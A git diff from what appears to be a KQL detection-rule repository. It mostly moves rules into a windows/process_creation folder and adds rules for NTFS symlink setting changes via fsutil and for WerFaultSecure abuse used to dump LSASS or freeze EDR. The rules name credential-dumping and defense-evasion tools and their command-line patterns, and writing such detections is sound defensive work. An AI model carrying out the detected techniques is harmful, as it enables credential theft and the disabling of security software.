a/KQL/rules/Execution/potential_winapi_calls_via_commandline.kql b/KQL/rules/windows/process_creation/potential_winapi_calls_via_commandline.kql similarity index 100% rename from KQL/rules/Execution/potential_winapi_calls_via_commandline.kql rename to KQL/rules/windows/process_creation/potential_winapi_calls_via_commandline.kql diff --git a/KQL/rules/Credential Access/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql b/KQL/rules/windows/process_creation/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql similarity index 100% rename from KQL/rules/Credential Access/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql rename to KQL/rules/windows/process_creation/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql diff --git a/KQL/rules/Defense Evasion/potential_windows_defender_tampering_via_wmic_exe.kql b/KQL/rules/windows/process_creation/potential_windows_defender_tampering_via_wmic_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_windows_defender_tampering_via_wmic_exe.kql rename to KQL/rules/windows/process_creation/potential_windows_defender_tampering_via_wmic_exe.kql diff --git a/KQL/rules/Execution/potential_wmi_lateral_movement_wmiprvse_spawned_powershell.kql b/KQL/rules/windows/process_creation/potential_wmi_lateral_movement_wmiprvse_spawned_powershell.kql similarity index 100% rename from KQL/rules/Execution/potential_wmi_lateral_movement_wmiprvse_spawned_powershell.kql rename to KQL/rules/windows/process_creation/potential_wmi_lateral_movement_wmiprvse_spawned_powershell.kql diff --git a/KQL/rules/Defense Evasion/potentially_over_permissive_permissions_granted_using_dsacls_exe.kql b/KQL/rules/windows/process_creation/potentially_over_permissive_permissions_granted_using_dsacls_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_over_permissive_permissions_granted_using_dsacls_exe.kql rename to KQL/rules/windows/process_creation/potentially_over_permissive_permissions_granted_using_dsacls_exe.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_asp_net_compilation_via_aspnetcompiler.kql b/KQL/rules/windows/process_creation/potentially_suspicious_asp_net_compilation_via_aspnetcompiler.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_asp_net_compilation_via_aspnetcompiler.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_asp_net_compilation_via_aspnetcompiler.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_cabinet_file_expansion.kql b/KQL/rules/windows/process_creation/potentially_suspicious_cabinet_file_expansion.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_cabinet_file_expansion.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_cabinet_file_expansion.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_call_to_win32_nteventlogfile_class.kql b/KQL/rules/windows/process_creation/potentially_suspicious_call_to_win32_nteventlogfile_class.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_call_to_win32_nteventlogfile_class.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_call_to_win32_nteventlogfile_class.kql diff --git a/KQL/rules/Execution/potentially_suspicious_child_process_of_clickonce_application.kql b/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_clickonce_application.kql similarity index 100% rename from KQL/rules/Execution/potentially_suspicious_child_process_of_clickonce_application.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_clickonce_application.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_diskshadow_exe.kql b/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_diskshadow_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_diskshadow_exe.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_diskshadow_exe.kql diff --git a/KQL/rules/Persistence/potentially_suspicious_child_process_of_keyscrambler_exe.kql b/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_keyscrambler_exe.kql similarity index 100% rename from KQL/rules/Persistence/potentially_suspicious_child_process_of_keyscrambler_exe.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_keyscrambler_exe.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_regsvr32.kql b/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_regsvr32.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_regsvr32.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_regsvr32.kql diff --git a/KQL/rules/Execution/potentially_suspicious_child_process_of_vscode.kql b/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_vscode.kql similarity index 100% rename from KQL/rules/Execution/potentially_suspicious_child_process_of_vscode.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_vscode.kql diff --git a/KQL/rules/Execution/potentially_suspicious_child_process_of_winrar_exe.kql b/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_winrar_exe.kql similarity index 100% rename from KQL/rules/Execution/potentially_suspicious_child_process_of_winrar_exe.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_winrar_exe.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_child_processes_spawned_by_conhost.kql b/KQL/rules/windows/process_creation/potentially_suspicious_child_processes_spawned_by_conhost.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_child_processes_spawned_by_conhost.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_child_processes_spawned_by_conhost.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_cmd_shell_output_redirect.kql b/KQL/rules/windows/process_creation/potentially_suspicious_cmd_shell_output_redirect.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_cmd_shell_output_redirect.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_cmd_shell_output_redirect.kql diff --git a/KQL/rules/Credential Access/potentially_suspicious_command_targeting_teams_sensitive_files.kql b/KQL/rules/windows/process_creation/potentially_suspicious_command_targeting_teams_sensitive_files.kql similarity index 100% rename from KQL/rules/Credential Access/potentially_suspicious_command_targeting_teams_sensitive_files.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_command_targeting_teams_sensitive_files.kql diff --git a/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_using_reg_exe.kql b/KQL/rules/windows/process_creation/potentially_suspicious_desktop_background_change_using_reg_exe.kql similarity index 100% rename from KQL/rules/Persistence/potentially_suspicious_desktop_background_change_using_reg_exe.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_desktop_background_change_using_reg_exe.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_dll_registered_via_odbcconf_exe.kql b/KQL/rules/windows/process_creation/potentially_suspicious_dll_registered_via_odbcconf_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_dll_registered_via_odbcconf_exe.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_dll_registered_via_odbcconf_exe.kql diff --git a/KQL/rules/Execution/potentially_suspicious_electron_application_commandline.kql b/KQL/rules/windows/process_creation/potentially_suspicious_electron_application_commandline.kql similarity index 100% rename from KQL/rules/Execution/potentially_suspicious_electron_application_commandline.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_electron_application_commandline.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_event_viewer_child_process.kql b/KQL/rules/windows/process_creation/potentially_suspicious_event_viewer_child_process.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_event_viewer_child_process.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_event_viewer_child_process.kql diff --git a/KQL/rules/Credential Access/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql b/KQL/rules/windows/process_creation/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql similarity index 100% rename from KQL/rules/Credential Access/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_parent_process_in_public_folder.kql b/KQL/rules/windows/process_creation/potentially_suspicious_execution_from_parent_process_in_public_folder.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_execution_from_parent_process_in_public_folder.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_execution_from_parent_process_in_public_folder.kql diff --git a/KQL/rules/Execution/potentially_suspicious_execution_of_pdqdeployrunner.kql b/KQL/rules/windows/process_creation/potentially_suspicious_execution_of_pdqdeployrunner.kql similarity index 100% rename from KQL/rules/Execution/potentially_suspicious_execution_of_pdqdeployrunner.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_execution_of_pdqdeployrunner.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_from_uncommon_location.kql b/KQL/rules/windows/process_creation/potentially_suspicious_execution_of_regasm_regsvcs_from_uncommon_location.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_from_uncommon_location.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_execution_of_regasm_regsvcs_from_uncommon_location.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_with_uncommon_extension.kql b/KQL/rules/windows/process_creation/potentially_suspicious_execution_of_regasm_regsvcs_with_uncommon_extension.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_with_uncommon_extension.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_execution_of_regasm_regsvcs_with_uncommon_extension.kql diff --git a/KQL/rules/Execution/potentially_suspicious_file_download_from_file_sharing_domain_via_powershell_exe.kql b/KQL/rules/windows/process_creation/potentially_suspicious_file_download_from_file_sharing_domain_via_powershell_exe.kql similarity index 100% rename from KQL/rules/Execution/potentially_suspicious_file_download_from_file_sharing_domain_via_powershell_exe.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_file_download_from_file_sharing_domain_via_powershell_exe.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_googleupdate_child_process.kql b/KQL/rules/windows/process_creation/potentially_suspicious_googleupdate_child_process.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_googleupdate_child_process.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_googleupdate_child_process.kql diff --git a/KQL/rules/Execution/potentially_suspicious_inline_javascript_execution_via_nodejs_binary.kql b/KQL/rules/windows/process_creation/potentially_suspicious_inline_javascript_execution_via_nodejs_binary.kql similarity index 100% rename from KQL/rules/Execution/potentially_suspicious_inline_javascript_execution_via_nodejs_binary.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_inline_javascript_execution_via_nodejs_binary.kql diff --git a/KQL/rules/Credential Access/potentially_suspicious_jwt_token_search_via_cli.kql b/KQL/rules/windows/process_creation/potentially_suspicious_jwt_token_search_via_cli.kql similarity index 100% rename from KQL/rules/Credential Access/potentially_suspicious_jwt_token_search_via_cli.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_jwt_token_search_via_cli.kql diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_ntfs_symlink_behavior_modification.kql b/KQL/rules/windows/process_creation/potentially_suspicious_ntfs_symlink_behavior_modification.kql new file mode 100644 index 00000000..d320293e --- /dev/null +++ b/KQL/rules/windows/process_creation/potentially_suspicious_ntfs_symlink_behavior_modification.kql @@ -0,0 +1,12 @@ +// Title: Potentially Suspicious NTFS Symlink Behavior Modification +// Author: frack113, The DFIR Report +// Date: 2022-03-02 +// Level: medium +// Description: Detects the modification of NTFS symbolic link behavior using fsutil, which could be used to enable remote to local or remote to remote symlinks for potential attacks. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1222.001 +// False Positives: +// - Legitimate usage, investigate the parent process and context to determine if benign. + +DeviceProcessEvents +| where (ProcessCommandLine contains "fsutil" and ProcessCommandLine contains "behavior" and ProcessCommandLine contains "set" and ProcessCommandLine contains "SymlinkEvaluation") and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "R2L:1" or ProcessCommandLine contains "R2R:1" or ProcessCommandLine contains "L2L:1") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_office_document_executed_from_trusted_location.kql b/KQL/rules/windows/process_creation/potentially_suspicious_office_document_executed_from_trusted_location.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_office_document_executed_from_trusted_location.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_office_document_executed_from_trusted_location.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_ping_copy_command_combination.kql b/KQL/rules/windows/process_creation/potentially_suspicious_ping_copy_command_combination.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_ping_copy_command_combination.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_ping_copy_command_combination.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ftp_pattern.kql b/KQL/rules/windows/process_creation/potentially_suspicious_regsvr32_http_ftp_pattern.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ftp_pattern.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_regsvr32_http_ftp_pattern.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ip_pattern.kql b/KQL/rules/windows/process_creation/potentially_suspicious_regsvr32_http_ip_pattern.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_regsvr32_http_ip_pattern.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_regsvr32_http_ip_pattern.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_activity.kql b/KQL/rules/windows/process_creation/potentially_suspicious_rundll32_activity.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_rundll32_activity.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_rundll32_activity.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql b/KQL/rules/windows/process_creation/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql diff --git a/KQL/rules/Command and Control/potentially_suspicious_usage_of_qemu.kql b/KQL/rules/windows/process_creation/potentially_suspicious_usage_of_qemu.kql similarity index 100% rename from KQL/rules/Command and Control/potentially_suspicious_usage_of_qemu.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_usage_of_qemu.kql diff --git a/KQL/rules/Execution/potentially_suspicious_webdav_lnk_execution.kql b/KQL/rules/windows/process_creation/potentially_suspicious_webdav_lnk_execution.kql similarity index 100% rename from KQL/rules/Execution/potentially_suspicious_webdav_lnk_execution.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_webdav_lnk_execution.kql diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_windows_app_activity.kql b/KQL/rules/windows/process_creation/potentially_suspicious_windows_app_activity.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_suspicious_windows_app_activity.kql rename to KQL/rules/windows/process_creation/potentially_suspicious_windows_app_activity.kql diff --git a/KQL/rules/Defense Evasion/powershell_base64_encoded_frombase64string_cmdlet.kql b/KQL/rules/windows/process_creation/powershell_base64_encoded_frombase64string_cmdlet.kql similarity index 100% rename from KQL/rules/Defense Evasion/powershell_base64_encoded_frombase64string_cmdlet.kql rename to KQL/rules/windows/process_creation/powershell_base64_encoded_frombase64string_cmdlet.kql diff --git a/KQL/rules/Execution/powershell_base64_encoded_iex_cmdlet.kql b/KQL/rules/windows/process_creation/powershell_base64_encoded_iex_cmdlet.kql similarity index 100% rename from KQL/rules/Execution/powershell_base64_encoded_iex_cmdlet.kql rename to KQL/rules/windows/process_creation/powershell_base64_encoded_iex_cmdlet.kql diff --git a/KQL/rules/Execution/powershell_base64_encoded_invoke_keyword.kql b/KQL/rules/windows/process_creation/powershell_base64_encoded_invoke_keyword.kql similarity index 100% rename from KQL/rules/Execution/powershell_base64_encoded_invoke_keyword.kql rename to KQL/rules/windows/process_creation/powershell_base64_encoded_invoke_keyword.kql diff --git a/KQL/rules/Defense Evasion/powershell_base64_encoded_mppreference_cmdlet.kql b/KQL/rules/windows/process_creation/powershell_base64_encoded_mppreference_cmdlet.kql similarity index 100% rename from KQL/rules/Defense Evasion/powershell_base64_encoded_mppreference_cmdlet.kql rename to KQL/rules/windows/process_creation/powershell_base64_encoded_mppreference_cmdlet.kql diff --git a/KQL/rules/Execution/powershell_base64_encoded_reflective_assembly_load.kql b/KQL/rules/windows/process_creation/powershell_base64_encoded_reflective_assembly_load.kql similarity index 100% rename from KQL/rules/Execution/powershell_base64_encoded_reflective_assembly_load.kql rename to KQL/rules/windows/process_creation/powershell_base64_encoded_reflective_assembly_load.kql diff --git a/KQL/rules/Execution/powershell_base64_encoded_wmi_classes.kql b/KQL/rules/windows/process_creation/powershell_base64_encoded_wmi_classes.kql similarity index 100% rename from KQL/rules/Execution/powershell_base64_encoded_wmi_classes.kql rename to KQL/rules/windows/process_creation/powershell_base64_encoded_wmi_classes.kql diff --git a/KQL/rules/Defense Evasion/powershell_defender_disable_scan_feature.kql b/KQL/rules/windows/process_creation/powershell_defender_disable_scan_feature.kql similarity index 100% rename from KQL/rules/Defense Evasion/powershell_defender_disable_scan_feature.kql rename to KQL/rules/windows/process_creation/powershell_defender_disable_scan_feature.kql diff --git a/KQL/rules/Defense Evasion/powershell_defender_exclusion.kql b/KQL/rules/windows/process_creation/powershell_defender_exclusion.kql similarity index 100% rename from KQL/rules/Defense Evasion/powershell_defender_exclusion.kql rename to KQL/rules/windows/process_creation/powershell_defender_exclusion.kql diff --git a/KQL/rules/Defense Evasion/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql b/KQL/rules/windows/process_creation/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql similarity index 100% rename from KQL/rules/Defense Evasion/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql rename to KQL/rules/windows/process_creation/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql diff --git a/KQL/rules/Execution/powershell_download_and_execution_cradles.kql b/KQL/rules/windows/process_creation/powershell_download_and_execution_cradles.kql similarity index 100% rename from KQL/rules/Execution/powershell_download_and_execution_cradles.kql rename to KQL/rules/windows/process_creation/powershell_download_and_execution_cradles.kql diff --git a/KQL/rules/Execution/powershell_download_pattern.kql b/KQL/rules/windows/process_creation/powershell_download_pattern.kql similarity index 100% rename from KQL/rules/Execution/powershell_download_pattern.kql rename to KQL/rules/windows/process_creation/powershell_download_pattern.kql diff --git a/KQL/rules/Defense Evasion/powershell_executed_from_headless_conhost_process.kql b/KQL/rules/windows/process_creation/powershell_executed_from_headless_conhost_process.kql similarity index 100% rename from KQL/rules/Defense Evasion/powershell_executed_from_headless_conhost_process.kql rename to KQL/rules/windows/process_creation/powershell_executed_from_headless_conhost_process.kql diff --git a/KQL/rules/Execution/powershell_execution_with_potential_decryption_capabilities.kql b/KQL/rules/windows/process_creation/powershell_execution_with_potential_decryption_capabilities.kql similarity index 100% rename from KQL/rules/Execution/powershell_execution_with_potential_decryption_capabilities.kql rename to KQL/rules/windows/process_creation/powershell_execution_with_potential_decryption_capabilities.kql diff --git a/KQL/rules/Collection/powershell_get_clipboard_cmdlet_via_cli.kql b/KQL/rules/windows/process_creation/powershell_get_clipboard_cmdlet_via_cli.kql similarity index 100% rename from KQL/rules/Collection/powershell_get_clipboard_cmdlet_via_cli.kql rename to KQL/rules/windows/process_creation/powershell_get_clipboard_cmdlet_via_cli.kql diff --git a/KQL/rules/Credential Access/powershell_get_process_lsass.kql b/KQL/rules/windows/process_creation/powershell_get_process_lsass.kql similarity index 100% rename from KQL/rules/Credential Access/powershell_get_process_lsass.kql rename to KQL/rules/windows/process_creation/powershell_get_process_lsass.kql diff --git a/KQL/rules/Execution/powershell_inline_execution_from_a_file.kql b/KQL/rules/windows/process_creation/powershell_inline_execution_from_a_file.kql similarity index 100% rename from KQL/rules/Execution/powershell_inline_execution_from_a_file.kql rename to KQL/rules/windows/process_creation/powershell_inline_execution_from_a_file.kql diff --git a/KQL/rules/Execution/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql b/KQL/rules/windows/process_creation/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql similarity index 100% rename from KQL/rules/Execution/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql rename to KQL/rules/windows/process_creation/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql diff --git a/KQL/rules/Credential Access/powershell_sam_copy.kql b/KQL/rules/windows/process_creation/powershell_sam_copy.kql similarity index 100% rename from KQL/rules/Credential Access/powershell_sam_copy.kql rename to KQL/rules/windows/process_creation/powershell_sam_copy.kql diff --git a/KQL/rules/Defense Evasion/powershell_script_change_permission_via_set_acl.kql b/KQL/rules/windows/process_creation/powershell_script_change_permission_via_set_acl.kql similarity index 100% rename from KQL/rules/Defense Evasion/powershell_script_change_permission_via_set_acl.kql rename to KQL/rules/windows/process_creation/powershell_script_change_permission_via_set_acl.kql diff --git a/KQL/rules/Execution/powershell_script_run_in_appdata.kql b/KQL/rules/windows/process_creation/powershell_script_run_in_appdata.kql similarity index 100% rename from KQL/rules/Execution/powershell_script_run_in_appdata.kql rename to KQL/rules/windows/process_creation/powershell_script_run_in_appdata.kql diff --git a/KQL/rules/Defense Evasion/powershell_set_acl_on_windows_folder.kql b/KQL/rules/windows/process_creation/powershell_set_acl_on_windows_folder.kql similarity index 100% rename from KQL/rules/Defense Evasion/powershell_set_acl_on_windows_folder.kql rename to KQL/rules/windows/process_creation/powershell_set_acl_on_windows_folder.kql diff --git a/KQL/rules/Defense Evasion/powershell_token_obfuscation_process_creation.kql b/KQL/rules/windows/process_creation/powershell_token_obfuscation_process_creation.kql similarity index 100% rename from KQL/rules/Defense Evasion/powershell_token_obfuscation_process_creation.kql rename to KQL/rules/windows/process_creation/powershell_token_obfuscation_process_creation.kql diff --git a/KQL/rules/Privilege Escalation/powershell_web_access_feature_enabled_via_dism.kql b/KQL/rules/windows/process_creation/powershell_web_access_feature_enabled_via_dism.kql similarity index 100% rename from KQL/rules/Privilege Escalation/powershell_web_access_feature_enabled_via_dism.kql rename to KQL/rules/windows/process_creation/powershell_web_access_feature_enabled_via_dism.kql diff --git a/KQL/rules/windows/process_creation/ppl_tampering_via_werfaultsecure.kql b/KQL/rules/windows/process_creation/ppl_tampering_via_werfaultsecure.kql new file mode 100644 index 00000000..e4806476 --- /dev/null +++ b/KQL/rules/windows/process_creation/ppl_tampering_via_werfaultsecure.kql @@ -0,0 +1,17 @@ +// Title: PPL Tampering Via WerFaultSecure +// Author: Jason (https://github.com/0xbcf) +// Date: 2025-09-23 +// Level: high +// Description: Detects potential abuse of WerFaultSecure.exe to dump Protected Process Light (PPL) processes like LSASS or to freeze security solutions (EDR/antivirus). +// This technique is used by tools such as EDR-Freeze and WSASS to bypass PPL protections and access sensitive information or disable security software. +// Distinct command line patterns help identify the specific tool: +// - WSASS usage typically shows: "WSASS.exe WerFaultSecure.exe [PID]" in ParentCommandLine +// - EDR-Freeze usage typically shows: "EDR-Freeze_[version].exe [PID] [timeout]" in ParentCommandLine +// Legitimate debugging operations using WerFaultSecure are rare in production environments and should be investigated. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001, attack.credential-access, attack.t1003.001 +// False Positives: +// - Legitimate usage of WerFaultSecure for debugging purposes + +DeviceProcessEvents +| where (ProcessCommandLine contains " /h " and ProcessCommandLine contains " /pid " and ProcessCommandLine contains " /tid " and ProcessCommandLine contains " /encfile " and ProcessCommandLine contains " /cancel " and ProcessCommandLine contains " /type " and ProcessCommandLine contains " 268310") and (FolderPath endswith "\\WerFaultSecure.exe" or ProcessVersionInfoOriginalFileName =~ "WerFaultSecure.exe") \ No newline at end of file diff --git a/KQL/rules/Command and Control/printbrm_zip_creation_of_extraction.kql b/KQL/rules/windows/process_creation/printbrm_zip_creation_of_extraction.kql similarity index 100% rename from KQL/rules/Command and Control/printbrm_zip_creation_of_extraction.kql rename to KQL/rules/windows/process_creation/printbrm_zip_creation_of_extraction.kql diff --git a/KQL/rules/Credential Access/private_keys_reconnaissance_via_commandline_tools.kql b/KQL/rules/windows/process_creation/private_keys_reconnaissance_via_commandline_tools.kql similarity index 100% rename from KQL/rules/Credential Access/private_keys_reconnaissance_via_commandline_tools.kql rename to KQL/rules/windows/process_creation/private_keys_reconnaissance_via_commandline_tools.kql diff --git a/KQL/rules/Lateral Movement/privilege_escalation_via_named_pipe_impersonation.kql b/KQL/rules/windows/process_creation/privilege_escalation_via_named_pipe_impersonation.kql similarity index 100% rename from KQL/rules/Lateral Movement/privilege_escalation_via_named_pipe_impersonation.kql rename to KQL/rules/windows/process_creation/privilege_escalation_via_named_pipe_impersonation.kql diff --git a/KQL/rules/Defense Evasion/procdump_execution.kql b/KQL/rules/windows/process_creation/procdump_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/procdump_execution.kql rename to KQL/rules/windows/process_creation/procdump_execution.kql diff --git a/KQL/rules/Defense Evasion/process_access_via_trolleyexpress_exclusion.kql b/KQL/rules/windows/process_creation/process_access_via_trolleyexpress_exclusion.kql similarity index 100% rename from KQL/rules/Defense Evasion/process_access_via_trolleyexpress_exclusion.kql rename to KQL/rules/windows/process_creation/process_access_via_trolleyexpress_exclusion.kql diff --git a/KQL/rules/Defense Evasion/process_creation_using_sysnative_folder.kql b/KQL/rules/windows/process_creation/process_creation_using_sysnative_folder.kql similarity index 100% rename from KQL/rules/Defense Evasion/process_creation_using_sysnative_folder.kql rename to KQL/rules/windows/process_creation/process_creation_using_sysnative_folder.kql diff --git a/KQL/rules/Defense Evasion/process_execution_from_a_potentially_suspicious_folder.kql b/KQL/rules/windows/process_creation/process_execution_from_a_potentially_suspicious_folder.kql similarity index 100% rename from KQL/rules/Defense Evasion/process_execution_from_a_potentially_suspicious_folder.kql rename to KQL/rules/windows/process_creation/process_execution_from_a_potentially_suspicious_folder.kql diff --git a/KQL/rules/Defense Evasion/process_launched_without_image_name.kql b/KQL/rules/windows/process_creation/process_launched_without_image_name.kql similarity index 100% rename from KQL/rules/Defense Evasion/process_launched_without_image_name.kql rename to KQL/rules/windows/process_creation/process_launched_without_image_name.kql diff --git a/KQL/rules/Defense Evasion/process_memory_dump_via_comsvcs_dll.kql b/KQL/rules/windows/process_creation/process_memory_dump_via_comsvcs_dll.kql similarity index 100% rename from KQL/rules/Defense Evasion/process_memory_dump_via_comsvcs_dll.kql rename to KQL/rules/windows/process_creation/process_memory_dump_via_comsvcs_dll.kql diff --git a/KQL/rules/Defense Evasion/process_memory_dump_via_dotnet_dump.kql b/KQL/rules/windows/process_creation/process_memory_dump_via_dotnet_dump.kql similarity index 100% rename from KQL/rules/Defense Evasion/process_memory_dump_via_dotnet_dump.kql rename to KQL/rules/windows/process_creation/process_memory_dump_via_dotnet_dump.kql diff --git a/KQL/rules/Credential Access/process_memory_dump_via_rdrleakdiag_exe.kql b/KQL/rules/windows/process_creation/process_memory_dump_via_rdrleakdiag_exe.kql similarity index 100% rename from KQL/rules/Credential Access/process_memory_dump_via_rdrleakdiag_exe.kql rename to KQL/rules/windows/process_creation/process_memory_dump_via_rdrleakdiag_exe.kql diff --git a/KQL/rules/Defense Evasion/process_proxy_execution_via_squirrel_exe.kql b/KQL/rules/windows/process_creation/process_proxy_execution_via_squirrel_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/process_proxy_execution_via_squirrel_exe.kql rename to KQL/rules/windows/process_creation/process_proxy_execution_via_squirrel_exe.kql diff --git a/KQL/rules/Execution/process_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/process_reconnaissance_via_wmic_exe.kql similarity index 100% rename from KQL/rules/Execution/process_reconnaissance_via_wmic_exe.kql rename to KQL/rules/windows/process_creation/process_reconnaissance_via_wmic_exe.kql diff --git a/KQL/rules/Defense Evasion/proxy_execution_via_vshadow.kql b/KQL/rules/windows/process_creation/proxy_execution_via_vshadow.kql similarity index 100% rename from KQL/rules/Defense Evasion/proxy_execution_via_vshadow.kql rename to KQL/rules/windows/process_creation/proxy_execution_via_vshadow.kql diff --git a/KQL/rules/Defense Evasion/proxy_execution_via_wuauclt_exe.kql b/KQL/rules/windows/process_creation/proxy_execution_via_wuauclt_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/proxy_execution_via_wuauclt_exe.kql rename to KQL/rules/windows/process_creation/proxy_execution_via_wuauclt_exe.kql diff --git a/KQL/rules/Execution/psexec_execution.kql b/KQL/rules/windows/process_creation/psexec_execution.kql similarity index 100% rename from KQL/rules/Execution/psexec_execution.kql rename to KQL/rules/windows/process_creation/psexec_execution.kql diff --git a/KQL/rules/Resource Development/psexec_paexec_escalation_to_local_system.kql b/KQL/rules/windows/process_creation/psexec_paexec_escalation_to_local_system.kql similarity index 100% rename from KQL/rules/Resource Development/psexec_paexec_escalation_to_local_system.kql rename to KQL/rules/windows/process_creation/psexec_paexec_escalation_to_local_system.kql diff --git a/KQL/rules/Execution/psexec_service_child_process_execution_as_local_system.kql b/KQL/rules/windows/process_creation/psexec_service_child_process_execution_as_local_system.kql similarity index 100% rename from KQL/rules/Execution/psexec_service_child_process_execution_as_local_system.kql rename to KQL/rules/windows/process_creation/psexec_service_child_process_execution_as_local_system.kql diff --git a/KQL/rules/Execution/psexec_service_execution.kql b/KQL/rules/windows/process_creation/psexec_service_execution.kql similarity index 100% rename from 